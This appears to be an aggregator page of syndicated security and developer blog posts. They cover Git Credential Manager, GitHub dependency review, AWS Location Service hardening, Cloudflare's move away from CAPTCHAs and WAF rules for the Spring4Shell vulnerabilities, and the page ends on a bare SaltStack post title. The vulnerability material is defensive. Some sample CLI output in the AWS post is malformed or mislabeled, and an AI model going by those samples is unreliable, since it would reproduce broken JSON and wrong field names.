These words were true when I wrote them back in July 2020, and they’re still true today. The goal of Git Credential Manager (GCM) is to make the task of authenticating to your remote Git repositories easy and secure, no matter where your code is stored or how you choose to work. In short, GCM wants to be Git’s universal authentication experience.

In my last blog post, I talked about the risk of proliferating “universal standards” and how introducing Git Credential Manager Core (GCM Core) would mean yet another credential helper in the wild. I’m therefore pleased to say that we’ve managed to successfully replace both GCM for Windows and GCM for Mac and Linux with the new GCM! The source code of the older projects has been archived, and they are no longer shipped with distributions like Git for Windows!

In order to celebrate and reflect this successful unification, we decided to drop the “Core” moniker from the project’s name to become simply Git Credential Manager or GCM for short.

Git Credential Manager

If you have followed the development of GCM closely, you might have also noticed we have a new home on GitHub in our own organization, github.com/GitCredentialManager!

We felt being homed under github.com/microsoft or github.com/github didn’t quite represent the ethos of GCM as an open, universal and agnostic project. All existing issues and pull requests were migrated, and we continue to welcome everyone to contribute to the project.

GCM Home

Interacting with HTTP remotes without the help of a credential helper like GCM is becoming more difficult with the removal of username/password authentication at GitHub and Bitbucket. Using GCM makes it easy, and with exciting developments such as using GitHub Mobile for two-factor authentication and OAuth device code flow support, we are making authentication more seamless.

Hello, Linux!

In the quest to become a universal solution for Git authentication, we’ve worked hard on getting GCM to work well on various Linux distributions, with a primary focus on Debian-based distributions.

Today we have Debian packages available to download from our GitHub releases page, as well as tarballs for other distributions (64-bit Intel only). Being built on the .NET platform means there should be a reduced effort to build and run anywhere the .NET runtime runs. Over time, we hope to expand our support matrix of distributions and CPU architectures (by adding ARM64 support, for example).

Due to the broad and varied nature of Linux distributions, it’s important that GCM offers many different credential storage options. In addition to GPG encrypted files, we added support for the Secret Service API via libsecret (also see the GNOME Keyring), which provides a similar experience to what we provide today in GCM on Windows and macOS.
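As a sketch, choosing a backend is a one-line Git configuration change; the values below follow GCM’s credential store settings and assume libsecret or GPG is already set up on your system:

# Use the Secret Service API via libsecret (for example, GNOME Keyring)
git config --global credential.credentialStore secretservice

# Or use GPG-encrypted credential files
git config --global credential.credentialStore gpg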

Windows Subsystem for Linux

In addition to Linux distributions, we also have special support for using GCM with Windows Subsystem for Linux (WSL). Using GCM with WSL means that all your WSL installations can share Git credentials with each other and the Windows host, enabling you to easily mix and match your development environments.

Easily mix and match your development environments

You can read more about using GCM inside of your WSL installations here.

Hello, GitLab

Being universal doesn’t just mean we want to run in more places, but also that we can help more users with whatever Git hosting service they choose to use. We are very lucky to have such an engaged community that is constantly working to make GCM better for everyone.

On that note, I am thrilled to share that through a community contribution, GCM now has support for GitLab.  Welcome to the family!

GCM for everyone

Look Ma, no terminals!

We love the terminal and so does GCM. However, we know that not everyone feels comfortable typing in commands and responding to prompts via the keyboard. Also, many popular tools and IDEs that offer Git integration do so by shelling out to the git executable, which means GCM may be called upon to perform authentication from a GUI app where there is no terminal(!)

GCM has always offered full graphical authentication prompts on Windows, but thanks to our adoption of the Avalonia project that provides a cross-platform .NET XAML framework, we can now present graphical prompts on macOS and Linux.

GCM continues to support terminal prompts as a first-class option for all prompts. We detect environments where there is no GUI (such as when connected over SSH without display forwarding) and instead present the equivalent text-based prompts. You can also manually disable the GUI prompts if you wish.

Securing the software supply chain

Keeping your source code secure is a critical step in maintaining trust in software, whether that be keeping commercially sensitive source code away from prying eyes or protecting against malicious actors making changes in both closed and open source projects that underpin much of the modern world.

In 2020, an extensive cyberattack was exposed that impacted parts of the US federal government as well as several major software companies. The US president’s recent executive order in response to this cyberattack brings into focus the importance of mechanisms such as multi-factor authentication, conditional access policies, and generally securing the software supply chain.

Store ALL the credentials

Git Credential Manager creates and stores credentials to access Git repositories on a host of platforms. We hold in the highest regard the need to keep your credentials and access secure. That’s why we always keep your credentials stored using industry standard encryption and storage APIs.

GCM makes use of the Windows Credential Manager on Windows and the login keychain on macOS.

In addition to these existing mechanisms, we also support several alternatives across supported platforms, giving you the choice of how and where you wish to store your generated credentials (such as GPG-encrypted credential files).

Store all your credentials

GCM can now also use Git’s git-credential-cache helper that is commonly built and available in many Git distributions. This is a great option for cloud shells or ephemeral environments when you don’t want to persist credentials permanently to disk but still want to avoid a prompt for every git fetch or git push.
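A minimal sketch of opting into this store; the second line is optional and passes a custom timeout through to Git’s credential cache daemon (the option name follows GCM’s documented cache settings, so double-check it against your installed version):

git config --global credential.credentialStore cache
git config --global credential.cacheOptions "--timeout 300"   # keep credentials for 5 minutes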

Modern Windows authentication (experimental)

Another way to keep your credentials safe at rest is with hardware-level support through technologies like the Trusted Platform Module (TPM) or Secure Enclave. Additionally, enterprises wishing to make sure your device or credentials have not been compromised may want to enforce conditional access policies.

Integrating with these kinds of security modules or enforcing policies can be tricky and is platform-dependent. It’s often easier for applications to hand over responsibility for the credential acquisition, storage, and policy
enforcement to an authentication broker.

An authentication broker performs credential negotiation on behalf of an app, simplifying many of these problems, and often comes with the added benefit of deeper integration with operating system features such as biometrics.

Authentication broker diagram

I’m happy to announce that GCM has gained experimental support for brokered authentication (Windows-only at the moment)!

On Windows, the authentication broker is a component that was first introduced in Windows 10 and is known as the Web Account Manager (WAM). WAM enables apps like GCM to support modern authentication experiences such as Windows Hello and will apply conditional access policies set by your work or school.

Please note that support for the Windows broker is currently experimental and limited to authentication of Microsoft work and school accounts against Azure DevOps.

Click here to read more about GCM and WAM, including how to opt-in and current known issues.

Even more improvements

GCM has been a hive of activity in the past 18 months, with too many new features and improvements to talk about in detail! Here’s a quick rundown of additional updates since our July 2020 post:

  • Automatic on-premises/self-hosted instance detection
  • GitHub Enterprise Server and GitHub AE support
  • Shared Microsoft Identity token caches with other developer tools
  • Improved network proxy support
  • Custom TLS/SSL root certificate support
  • Admin-less Windows installer
  • Improved command line handling and output
  • Enterprise default setting support on Windows
  • Multi-user support
  • Better diagnostics

Thank you!

The GCM team would also like to personally thank all the people who have made contributions, both large and small, to the project:

@vtbassmatt, @kyle-rader, @mminns, @ldennington, @hickford, @vdye, @AlexanderLanin, @derrickstolee, @NN, @johnemau, @karlhorky, @garvit-joshi, @jeschu1, @WormJim, @nimatt, @parasychic, @cjsimon, @czipperz, @jamill, @jessehouwing, @shegox, @dscho, @dmodena, @geirivarjerstad, @jrbriggs, @Molkree, @4brunu, @julescubtree, @kzu, @sivaraam, @mastercoms, @nightowlengineer

Future work

While we’ve made a great deal of progress toward our universal experience goal, we’re not slowing down anytime soon; we’re still full steam ahead with GCM!

Our focus for the next period will be on iterating and improving our authentication broker support, providing stronger protection of credentials, and looking to increase performance and compatibility with more environments and uses.

Prevent the introduction of known vulnerabilities into your code

Post Syndicated from Courtney Claessens original https://github.blog/2022-04-06-prevent-introduction-known-vulnerabilities-into-your-code/

Understanding your supply chain is critical to maintaining the security of your software. Dependabot already alerts you when vulnerabilities are found in your existing dependencies, but what if you add a new dependency with a vulnerability? With the dependency review action, you can proactively block pull requests that introduce dependencies with known vulnerabilities.

How it works

The GitHub Action automates finding and blocking vulnerabilities that are currently only displayed in the rich diff of a pull request. When you add the dependency review action to your repository, it will scan your pull requests for dependency changes. Then, it will check the GitHub Advisory Database to see if any of the new dependencies have existing vulnerabilities. If they do, the action will raise an error so that you can see which dependency has a vulnerability and implement the fix with the contextual intelligence provided. The action is supported by a new API endpoint that diffs the dependencies between any two revisions.

Demo of dependency review enforcement

The action can be found on GitHub Marketplace and in your repository’s Actions tab under the Security heading. It is available for all public repositories, as well as private repositories that have GitHub Advanced Security licensed.

We’re continuously improving the experience

While we’re currently in public beta, we’ll be adding functionality to give you more control over what causes the action to fail, including criteria based on vulnerability severity, license type, and other factors. We’re also improving how failed action runs are surfaced in the UI and increasing flexibility around when the action is executed.

If you have feedback or questions

We’re very keen to hear any and all feedback! Pop into the feedback discussion, and let us know how the new action is working for you, and how you’d like to see it grow.

For more information, visit the action and the documentation.

Best practices: Securing your Amazon Location Service resources

Post Syndicated from Dave Bailey original https://aws.amazon.com/blogs/security/best-practices-securing-your-amazon-location-service-resources/

Location data is subjected to heavy scrutiny by security experts. Knowing the current position of a person, vehicle, or asset can provide industries with many benefits, whether to understand where a current delivery is, how many people are inside a venue, or to optimize routing for a fleet of vehicles. This blog post explains how Amazon Web Services (AWS) helps keep location data secured in transit and at rest, and how you can leverage additional security features to help keep information safe and compliant.

The General Data Protection Regulation (GDPR) defines personal data as “any information relating to an identified or identifiable natural person (…) such as a name, an identification number, location data, an online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of that natural person.” Also, many companies wish to improve transparency to users, making it explicit when a particular application wants to not only track their position and data, but also to share that information with other apps and websites. Your organization needs to adapt to these changes quickly to maintain a secure stance in a competitive environment.

On June 1, 2021, AWS made Amazon Location Service generally available to customers. With Amazon Location, you can build applications that provide maps and points of interest, convert street addresses into geographic coordinates, calculate routes, track resources, and invoke actions based on location. The service enables you to access location data with developer tools and to move your applications to production faster with monitoring and management capabilities.

In this blog post, we will show you the features that Amazon Location provides out of the box to keep your data safe, along with best practices that you can follow to reach the level of security that your organization strives to accomplish.

Data control and data rights

Amazon Location relies on global trusted providers Esri and HERE Technologies to provide high-quality location data to customers. Features like maps, places, and routes are provided by these AWS Partners so solutions can have data that is not only accurate but constantly updated.

AWS anonymizes and encrypts location data at rest and during its transmission to partner systems. In parallel, third parties cannot sell your data or use it for advertising purposes, following our service terms. This helps you shield sensitive information, protect user privacy, and reduce organizational compliance risks. To learn more, see the Amazon Location Data Security and Control documentation.

Integrations

Operationalizing location-based solutions can be daunting. It’s not just necessary to build the solution, but also to integrate it with the rest of your applications that are built in AWS. Amazon Location facilitates this process from a security perspective by integrating with services that expedite the development process, enhancing the security aspects of the solution.

Encryption

Amazon Location uses AWS owned keys by default to automatically encrypt personally identifiable data. AWS owned keys are a collection of AWS Key Management Service (AWS KMS) keys that an AWS service owns and manages for use in multiple AWS accounts. Although AWS owned keys are not in your AWS account, Amazon Location can use the associated AWS owned keys to protect the resources in your account.

If customers choose to use their own keys, they can benefit from AWS KMS to store their own encryption keys and use them to add a second layer of encryption to geofencing and tracking data.

Authentication and authorization

Amazon Location also integrates with AWS Identity and Access Management (IAM), so that you can use its identity-based policies to specify allowed or denied actions and resources, as well as the conditions under which actions are allowed or denied on Amazon Location. Also, for actions that require unauthenticated access, you can use unauthenticated IAM roles.

As an extension to IAM, Amazon Cognito can be an option if you need to integrate your solution with a front-end client that authenticates users with its own process. In this case, you can use Cognito to handle the authentication, authorization, and user management for you. You can use Cognito unauthenticated identity pools with Amazon Location as a way for applications to retrieve temporary, scoped-down AWS credentials. To learn more about setting up Cognito with Amazon Location, see the blog post Add a map to your webpage with Amazon Location Service.
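As a minimal sketch, an identity pool that allows unauthenticated identities can be created with the AWS CLI (the pool name is a placeholder, and you still need to attach an appropriately scoped unauthenticated role, as described next):

aws cognito-identity create-identity-pool \
  --identity-pool-name "MyLocationAppPool" \
  --allow-unauthenticated-identities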

Limit the scope of your unauthenticated roles to a domain

When you are building an application that allows users to perform actions such as retrieving map tiles, searching for points of interest, updating device positions, and calculating routes without needing them to be authenticated, you can make use of unauthenticated roles.

When using unauthenticated roles to access Amazon Location resources, you can add an extra condition to limit resource access to an HTTP referer that you specify in the policy. The aws:referer request context value is provided by the caller in an HTTP header, and it is included in a web browser request.

The following is an example of a policy that allows access to a Map resource by using the aws:referer condition, but only if the request comes from the domain example.com.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "MapsReadOnly",
      "Effect": "Allow",
      "Action": [
        "geo:GetMapStyleDescriptor",
        "geo:GetMapGlyphs",
        "geo:GetMapSprites",
        "geo:GetMapTile"
      ],
      "Resource": "arn:aws:geo:us-west-2:111122223333:map/MyMap",
      "Condition": {
        "StringLike": {
          "aws:Referer": "https://www.example.com/*"
        }
      }
    }
  ]
}

To learn more about aws:referer and other global conditions, see AWS global condition context keys.
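As a sketch, a policy like the preceding one can be attached inline to the unauthenticated role used by your identity pool (the role name, policy name, and file path are placeholders):

aws iam put-role-policy \
  --role-name Cognito_MyLocationAppUnauth_Role \
  --policy-name AmazonLocationMapsRefererOnly \
  --policy-document file://maps-referer-policy.json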

Encrypt tracker and geofence information using customer managed keys with AWS KMS

When you create your tracker and geofence collection resources, you have the option to use a symmetric customer managed key to add a second layer of encryption to geofencing and tracking data. Because you have full control of this key, you can establish and maintain your own IAM policies, manage key rotation, and schedule keys for deletion.

After you create your resources with customer managed keys, the geometry of your geofences and all positions associated to a tracked device will have two layers of encryption. In the next sections, you will see how to create a key and use it to encrypt your own data.

Create an AWS KMS symmetric key

First, you need to create a key policy that will limit the AWS KMS key to allow access to principals authorized to use Amazon Location and to principals authorized to manage the key. For more information about specifying permissions in a policy, see the AWS KMS Developer Guide.

To create the key policy

Create a JSON policy file by using the following policy as a reference. This key policy allows Amazon Location to grant access to your KMS key only when it is called from your AWS account. This works by combining the kms:ViaService and kms:CallerAccount conditions. In the following policy, replace us-west-2 with your AWS Region of choice, and the kms:CallerAccount value with your AWS account ID. Adjust the KMS Key Administrators statement to reflect your actual key administrators’ principals, including yourself. For details on how to use the Principal element, see the AWS JSON policy elements documentation.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Amazon Location",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": [
        "kms:DescribeKey",
        "kms:CreateGrant"
      ],
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "kms:ViaService": "geo.us-west-2.amazonaws.com",
          "kms:CallerAccount": "111122223333"
        }
      }
    },
    {
      "Sid": "Allow access for Key Administrators",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111122223333:user/KMSKeyAdmin"
      },
      "Action": [
        "kms:Create*",
        "kms:Describe*",
        "kms:Enable*",
        "kms:List*",
        "kms:Put*",
        "kms:Update*",
        "kms:Revoke*",
        "kms:Disable*",
        "kms:Get*",
        "kms:Delete*",
        "kms:TagResource",
        "kms:UntagResource",
        "kms:ScheduleKeyDeletion",
        "kms:CancelKeyDeletion"
      ],
      "Resource": "*"
    }
  ]
}

For the next steps, you will use the AWS Command Line Interface (AWS CLI). Make sure to have the latest version installed by following the AWS CLI documentation.

Tip: AWS CLI will consider the Region you defined as the default during the configuration steps, but you can override this configuration by adding --region <your region> at the end of each command. Also, make sure that your user has the appropriate permissions to perform those actions.

To create the symmetric key

Now, create a symmetric key on AWS KMS by running the create-key command and passing the policy file that you created in the previous step.

aws kms create-key --policy file://<your JSON policy file>

Alternatively, you can create the symmetric key using the AWS KMS console with the preceding key policy.

After running the command, you should see the following output. Take note of the KeyId value.

{
  "KeyMetadata": {
    "Origin": "AWS_KMS",
    "KeyId": "1234abcd-12ab-34cd-56ef-1234567890ab",
    "Description": "",
    "KeyManager": "CUSTOMER",
    "Enabled": true,
    "CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
    "KeyUsage": "ENCRYPT_DECRYPT",
    "KeyState": "Enabled",
    "CreationDate": 1502910355.475,
    "Arn": "arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab",
    "AWSAccountId": "111122223333",
    "MultiRegion": false
    "EncryptionAlgorithms": [
      "SYMMETRIC_DEFAULT"
    ],
  }
}

Create an Amazon Location tracker and geofence collection resources

To create an Amazon Location tracker resource that uses AWS KMS for a second layer of encryption, run the following command, passing the key ID from the previous step.

aws location \
	create-tracker \
	--tracker-name "MySecureTracker" \
	--kms-key-id "1234abcd-12ab-34cd-56ef-1234567890ab"

Here is the output from this command.

{
    "CreateTime": "2021-07-15T04:54:12.913000+00:00",
    "TrackerArn": "arn:aws:geo:us-west-2:111122223333:tracker/MySecureTracker",
    "TrackerName": "MySecureTracker"
}

Similarly, to create a geofence collection by using your own KMS symmetric keys, run the following command, also modifying the key ID.

aws location \
	create-geofence-collection \
	--collection-name "MySecureGeofenceCollection" \
	--kms-key-id "1234abcd-12ab-34cd-56ef-1234567890ab"

Here is the output from this command.

{
    "CreateTime": "2021-07-15T04:54:12.913000+00:00",
    "TrackerArn": "arn:aws:geo:us-west-2:111122223333:geofence-collection/MySecureGeoCollection",
    "TrackerName": "MySecureGeoCollection"
}

By following these steps, you have added a second layer of encryption to your geofence collection and tracker.

Data retention best practices

Trackers and geofence collections are stored in your AWS account and never leave it without your permission, but they have different lifecycles on Amazon Location.

Trackers store the positions of devices and assets that are tracked in a longitude/latitude format. These positions are stored for 30 days by the service before being automatically deleted. If needed for historical purposes, you can transfer this data to another data storage layer and apply the proper security measures based on the shared responsibility model.
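If you do need the history, a sketch of exporting the stored positions for a single device before they expire, so you can persist them in your own storage layer (the tracker and device names are examples):

aws location get-device-position-history \
  --tracker-name "MySecureTracker" \
  --device-id "thing-1234" > thing-1234-history.json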

Geofence collections store the geometries you provide until you explicitly choose to delete them, so you can use encryption with AWS managed keys or your own keys to keep them for as long as needed.

Asset tracking and location storage best practices

After a tracker is created, you can start sending location updates by using the Amazon Location front-end SDKs or by calling the BatchUpdateDevicePosition API. In both cases, at a minimum, you need to provide the latitude and longitude, the time when the device was in that position, and a device-unique identifier that represents the asset being tracked.
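For reference, a single position update sent with the AWS CLI might look like the following sketch (the device ID, coordinates, and timestamp are examples only; note that Position is [longitude, latitude]):

aws location batch-update-device-position \
  --tracker-name "MySecureTracker" \
  --updates '[{"DeviceId":"thing-1234","Position":[-122.4194,37.7749],"SampleTime":"2021-07-15T05:00:00Z"}]'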

Protecting device IDs

This device ID can be any string of your choice, so you should apply measures to prevent certain IDs from being used. Some examples of what to avoid include:

  • First and last names
  • Facility names
  • Documents, such as driver’s licenses or social security numbers
  • Emails
  • Addresses
  • Telephone numbers

Latitude and longitude precision

Latitude and longitude coordinates convey precision in degrees, presented as decimals, with each decimal place representing a different measure of distance (when measured at the equator).

Amazon Location supports up to six decimal places of precision (0.000001), which is equal to approximately 11 cm or 4.4 inches at the equator. You can limit the number of decimal places in the latitude and longitude pair that is sent to the tracker based on the precision required, increasing the location range and providing extra privacy to users.
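For instance, a small shell sketch of rounding coordinates to four decimal places (roughly 11 meters at the equator) before sending them to a tracker:

# Round a sample latitude/longitude pair to 4 decimal places
lat=37.774929
lon=-122.419415
printf -v lat_rounded '%.4f' "$lat"
printf -v lon_rounded '%.4f' "$lon"
echo "$lat_rounded $lon_rounded"   # 37.7749 -122.4194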

Figure 1 shows a latitude and longitude pair, with the level of detail associated with each decimal place.

Figure 1: Geolocation decimal precision details

Position filtering

Amazon Location introduced position filtering as an option on trackers that helps reduce cost and jitter from inaccurate device location updates.

  • DistanceBased filtering ignores location updates wherein devices have moved less than 30 meters (98.4 ft).
  • TimeBased filtering evaluates every location update against linked geofence collections, but not every location update is stored. If your update frequency is more often than 30 seconds, then only one update per 30 seconds is stored for each unique device ID.
  • AccuracyBased filtering ignores location updates if the distance moved was less than the measured accuracy provided by the device.

By using filtering options, you can reduce the number of location updates that are sent and stored, thus reducing the level of location detail provided and increasing the level of privacy.
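As an example, filtering is selected when you create (or later update) a tracker; the following sketch enables time-based filtering on a new tracker (the name is a placeholder):

aws location \
	create-tracker \
	--tracker-name "MyFilteredTracker" \
	--position-filtering "TimeBased"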

Logging and monitoring

Amazon Location integrates with AWS services that provide the observability needed to help you comply with your organization’s security standards.

To record all actions that were taken by users, roles, or AWS services that access Amazon Location, consider using AWS CloudTrail. CloudTrail provides information on who is accessing your resources, detailing the account ID, principal ID, source IP address, timestamp, and more. Moreover, Amazon CloudWatch helps you collect and analyze metrics related to your Amazon Location resources. CloudWatch also allows you to create alarms based on pre-defined thresholds of call counts. These alarms can create notifications through Amazon Simple Notification Service (Amazon SNS) to automatically alert teams responsible for investigating abnormalities.

Conclusion

At AWS, security is our top priority. Security and compliance are a shared responsibility between AWS and the customer: AWS is responsible for protecting the infrastructure that runs all of the services offered in the AWS Cloud, and the customer is responsible for performing all of the necessary security configuration of the solutions they build on top of that infrastructure.

In this blog post, you’ve learned the controls and guardrails that Amazon Location provides out of the box to help provide data privacy and data protection to our customers. You also learned about the other mechanisms you can use to enhance your security posture.

Start building your own secure geolocation solutions by following the Amazon Location Developer Guide and learn more about how the service handles security by reading the security topics in the guide.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this blog post, start a new thread on Amazon Location Service forum or contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Rafael Leandro, Junior

Rafael Leandro, Junior, is a senior global solutions architect who currently focuses on the consumer packaged goods and transportation industries. He helps large global customers on their journeys with AWS.

David Bailey

David Bailey is a senior security consultant who helps AWS customers achieve their cloud security goals. He has a passion for building new technologies and providing mentorship for others.

The end of the road for Cloudflare CAPTCHAs

Post Syndicated from Reid Tatoris original https://blog.cloudflare.com/end-cloudflare-captcha/

There is no point in rehashing the fact that CAPTCHA provides a terrible user experience. It’s been discussed in detail before on this blog, and countless times elsewhere. One of the creators of the CAPTCHA has publicly lamented that he “unwittingly created a system that was frittering away, in ten-second increments, millions of hours of a most precious resource: human brain cycles.” We don’t like them, and you don’t like them.

So we decided we’re going to stop using CAPTCHAs. Using an iterative platform approach, we have already reduced the number of CAPTCHAs we choose to serve by 91% over the past year.

Before we talk about how we did it, and how you can help, let’s first start with a simple question.

Why in the world is CAPTCHA still used anyway?

If everyone agrees CAPTCHA is so bad, if there have been calls to get rid of it for 15 years, if the creator regrets creating it, why is it still widely used?

The frustrating truth is that CAPTCHA remains an effective tool for differentiating real human users from bots despite the existence of CAPTCHA-solving services. Of course, this comes with a huge trade off in terms of usability, but generally the alternatives to CAPTCHA are blocking or allowing traffic, which will inherently increase either false positives or false negatives. With a choice between increased errors and a poor user experience (CAPTCHA), many sites choose CAPTCHA.

CAPTCHAs are also a safe choice because so many other sites use them. They delegate abuse response to a third party, and remove the risk from the website with a simple integration. Using the most common solution will rarely get you into trouble. Plug, play, forget.

Lastly, CAPTCHA is useful because it has a long history of a known and stable baseline. We’ve tracked a metric called CAPTCHA (or Challenge) Solve Rate for many years. CAPTCHA solve rate is the number of CAPTCHAs solved, divided by the number of page loads. For our purposes both failing or not attempting to solve the CAPTCHA count as a failure, since in either case a user cannot access the content they want to. We find this metric to typically be stable for any particular website. That is, if the solve rate is 1%, it tends to remain at 1% over time. We also find that any change in solve rate – up or down – is a strong indicator of an attack in progress. Customers can monitor the solve rate and create alerts to notify them when it changes, then investigate what might be happening.

Many alternatives to CAPTCHA have been tried, including our own Cryptographic Attestation. However, to date, none have seen the amount of widespread adoption of CAPTCHAs. We believe attempting to replace CAPTCHA with a single alternative is the main reason why. When you replace CAPTCHA, you lose the stable history of the solve rate, and making decisions becomes more difficult. If you switch from deciphering text to picking images, you will get vastly different results. How do you know if those results are good or bad? So, we took a different approach.

Many solutions, not one

Rather than try to unilaterally deprecate and replace CAPTCHA with a single alternative, we built a platform to test many alternatives and see which had the best potential to replace CAPTCHA. We call this Cloudflare Managed Challenge.

Managed Challenge is a smarter solution than CAPTCHA. It defers the decision about whether to serve a visual puzzle to a later point in the flow after more information is available from the browser. Previously, a Cloudflare customer could only choose between either a CAPTCHA or JavaScript Challenge as the action of a security or firewall rule. Now, the Managed Challenge option will decide to show a visual puzzle or other means of proving humanness to visitors based on the client behavior exhibited during a challenge and based on the telemetry we receive from the visitor. A customer simply tells us, “I want you (Cloudflare) to take appropriate actions to challenge this type of traffic as you see necessary.”

With Managed Challenge, we adapt the actual challenge outcome to the individual visitor/browser. As a result, we can fine-tune the difficulty of the challenge itself and avoid showing visual puzzles to more than 90% of human requests, while at the same time presenting harder challenges to visitors that exhibit non-human behaviors.

When a visitor encounters a Managed Challenge, we first run a series of small non-interactive JavaScript challenges gathering more signals about the visitor/browser environment. This means we deploy in-browser detections and challenges at the time the request is made. Challenges are selected based on what characteristics the visitor emits and based on the initial information we have about the visitor. Those challenges include, but are not limited to, proof-of-work, proof-of-space, probing for web APIs, and various challenges for detecting browser-quirks and human behavior.

They also include machine learning models that detect common features of end visitors who were able to pass a CAPTCHA before. The computational hardness of those initial challenges may vary by visitor, but is targeted to run fast. Managed Challenge is also integrated into the Cloudflare Bot Management and Super Bot Fight Mode systems by consuming signals and data from the bot detections.

After our non-interactive challenges have been run, we evaluate the gathered signals. If by the combination of those signals we are confident that the visitor is likely human, no further action is taken, and the visitor is redirected to the destined page without any interaction required. However, in some cases, if the signal is weak, we present a visual puzzle to the visitor to prove their humanness. In the context of Managed Challenge, we’re also experimenting with other privacy-preserving means of attesting humanness, to continue reducing the portion of time that Managed Challenge uses a visual puzzle step.

We started testing Managed Challenge last year, and initially, we chose from a rotating subset of challenges, one of them being CAPTCHA. At the start, CAPTCHA was still used in the vast majority of cases. We compared the solve rate for the new challenge in question, with the existing, stable solve rate for CAPTCHA. We thus used CAPTCHA solve rate as a goal to work towards as we improved our CAPTCHA alternatives, getting better and better over time. The challenge platform allows our engineers to easily create, deploy, and test new types of challenges without impacting customers. When a challenge turns out to not be useful, we simply deprecate it. When it proves to be useful, we increase how often it is used. In order to preserve ground-truth, we also randomly choose a small subset of visitors to always solve a visual puzzle to validate our signals.

Managed Challenge performs better than CAPTCHA

The Challenge Platform now has the same stable solve rate as previously used CAPTCHAs.

Using an iterative platform approach, we have reduced the number of CAPTCHAs we serve by 91%. This is only the start. By the end of the year, we will reduce our use of CAPTCHA as a challenge to less than 1%. By skipping the visual puzzle step for almost all visitors, we are able to reduce the visitor time spent in a challenge from an average of 32 seconds to an average of just one second to run our non-interactive challenges. We also see churn improvements: our telemetry indicates that visitors with human properties are 31% less likely to abandon a Managed Challenge than on the traditional CAPTCHA action.

Today, the Managed Challenge platform rotates between many challenges. A Managed Challenge instance consists of many sub-challenges: some of them are established and effective, whereas others are new challenges we are experimenting with. All of them are much, much faster and easier for humans to complete than CAPTCHA, and almost always require no interaction from the visitor.

Managed Challenge replaces CAPTCHA for Cloudflare

We have now deployed Managed Challenge across the entire Cloudflare network. Any time we show a CAPTCHA to a visitor, it’s via the Managed Challenge platform, and only as a benchmark to confirm our other challenges are performing as well.

All Cloudflare customers can now choose Managed Challenge as a response option to any Firewall rule instead of CAPTCHA. We’ve also updated our dashboard to encourage all Cloudflare customers to make this choice.

You’ll notice that we changed the name of the CAPTCHA option to ‘Legacy CAPTCHA’. This more accurately describes what CAPTCHA is: an outdated tool that we don’t think people should use. As a result, the usage of CAPTCHA across the Cloudflare network has dropped significantly, and usage of managed challenge has increased dramatically.

As noted above, today CAPTCHA represents 9% of Managed Challenge solves (light blue), but that number will decrease to less than 1% by the end of the year. You’ll also see the gray bar above, which shows when our customers have chosen to show a CAPTCHA as a response to a Firewall rule triggering. We want that number to go to zero, but the good news is that 63% of customers now choose Managed Challenge rather than CAPTCHA when they create a Firewall rule with a challenge response action.

We expect this number to increase further over time.

If you’re using the Cloudflare WAF, log into the Dashboard today and look at all of your Firewall rules. If any of your rules are using “Legacy CAPTCHA” as a response, please change it now! Select the “Managed Challenge” response option instead. You’ll give your users a better experience, while maintaining the same level of protection you have today. If you’re not currently a Cloudflare customer, stay tuned for ways you can reduce your own use of CAPTCHA.
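If you manage rules through the API rather than the dashboard, the switch is a small change to the rule’s action. Here is a hedged sketch against the v4 firewall rules endpoint (the zone, rule, and filter IDs and the API token are placeholders, and the exact request body may vary with your rule’s other fields):

curl -X PUT "https://api.cloudflare.com/client/v4/zones/$ZONE_ID/firewall/rules/$RULE_ID" \
  -H "Authorization: Bearer $API_TOKEN" \
  -H "Content-Type: application/json" \
  --data '{"id": "'"$RULE_ID"'", "action": "managed_challenge", "filter": {"id": "'"$FILTER_ID"'"}}'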

WAF mitigations for Spring4Shell

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/waf-mitigations-sping4shell/

A set of high profile vulnerabilities have been identified affecting the popular Java Spring Framework and related software components – generally being referred to as Spring4Shell.

Four CVEs have been released so far and are being actively updated as new information emerges: CVE-2022-22947, CVE-2022-22950, CVE-2022-22963, and CVE-2022-22965. These vulnerabilities can result, in the worst case, in full remote code execution (RCE) compromise.

Customers using Java Spring and related software components, such as the Spring Cloud Gateway, should immediately review their software and update to the latest versions by following the official Spring project guidance.

The Cloudflare WAF team is actively monitoring these CVEs and has already deployed a number of new managed mitigation rules. Customers should review the rules listed below to ensure they are enabled while also patching the underlying Java Spring components.

CVE-2022-22947

A new rule has been developed and deployed for this CVE with an emergency release on March 29:

Managed Rule Spring – CVE:CVE-2022-22947

  • WAF rule ID: e777f95584ba429796856007fbe6c869
  • Legacy rule ID: 100522

Note that the above rule is disabled by default and may cause some false positives. We advise customers to review rule matches or to deploy the rule with a LOG action before switching to BLOCK.

CVE-2022-22950

Currently, available PoCs are blocked by the following rule:

Managed Rule PHP – Code Injection

  • WAF rule ID: 55b100786189495c93744db0e1efdffb
  • Legacy rule ID: PHP100011

CVE-2022-22963

Currently, available PoCs are blocked by the following rule:

Managed Rule Plone – Dangerous File Extension

  • WAF rule ID: aa3411d5505b4895b547d68950a28587
  • Legacy WAF ID: PLONE0001

We also deployed a new rule via an emergency release on March 31 (today at time of writing) to cover additional variations attempting to exploit this vulnerability:

Managed Rule Spring – Code Injection

  • WAF rule ID: d58ebf5351d843d3a39a4480f2cc4e84
  • Legacy WAF ID: 100524

Note that the newly released rule is disabled by default and may cause some false positives. We advise customers to review rule matches or to deploy the rule with a LOG action before switching to BLOCK.

Additionally, customers can receive protection against this CVE by deploying the Cloudflare OWASP Core Ruleset with default or better settings on our new WAF. Customers using our legacy WAF will have to configure a high OWASP sensitivity level.

CVE-2022-22965

We are currently investigating this recent CVE and will provide an update to our Managed Ruleset as soon as possible if an applicable mitigation strategy or bypass is found. Please review and monitor our public facing change log.

Future-proofing SaltStack

Post Syndicated from Lenka Mareková original https://blog.cloudflare.com/future-proofing-saltstack/

